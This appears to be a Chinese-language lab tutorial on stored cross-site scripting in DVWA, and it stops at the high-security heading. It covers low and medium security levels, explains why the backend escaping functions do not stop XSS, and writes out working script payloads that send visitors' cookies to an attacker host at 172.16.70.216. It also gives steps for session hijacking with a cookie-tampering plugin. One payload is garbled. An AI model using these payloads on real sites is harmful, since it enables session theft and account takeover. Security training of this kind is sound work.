概述
存储型XSS公鸡是一种常见的网络安全漏洞,其原理如下:
公鸡者在交互页面输入恶意代码,并将其提交到Web程序。
如果Web程序没有对输入内容进行XSS防范,恶意代码将被存储到数据库中。
当其他用户访问和查看公鸡者提交的内容时,Web应用程序从数据库中获取内容并传递给前端。
前端解析恶意代码,导致XSS公鸡的发生。
公鸡者利用存储型XSS漏洞可以执行恶意脚本,窃取用户的敏感信息,如登录凭证、个人信息等。这种公鸡方式的危害性较高,因为恶意代码存储在数据库中,可以影响到所有访问该内容的用户。
为了防止存储型XSS公鸡,开发人员应该对用户输入进行严格的过滤和验证,确保输入的内容不包含恶意代码。常见的防御措施包括对输入进行转义处理、使用安全的编码方式、限制输入的长度和格式等。
低安全级别
弹框告警
后台代码分析
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠
提示:该函数可用于清理从数据库中或者从 HTML 表单中取回的数据。
\
mysql_real_escape_string() 函数转义 SQL 语句 中使用的字符串中的特殊字符
提示:可使用本函数来预防数据库公鸡。
'
以上函数不针对xss做过滤
渗tou机
靶机
Cookie获取
渗tou机
<script>document.locatinotallow=" http://172.16.70.216/cookie.php?cookie="+document.cookie</script>
<script>new Image().src="http://172.16.70.216/cookie.php?cookie="+document.cookie;</script>
靶机
Cookie利用
①firefox安装tamper data插件
②开启tamper data
③浏览器输入172.16.70.156/dvwa/index.php
④tamper拦截,修改cookie为获取到的值,然后点击“tamper”,之后便跳转到首页
⑤查看首页左下角是否此cookie对应的用户
中安全级别
代码分析
message通过htmlspecialchars做了安全转义,但是name没有
渗tou机
<script>new Image().src="http://172.16.70.216/cookie.php?cookie="+document.cookie;</script>
修改name字段前端代码的字符限制
高安全级别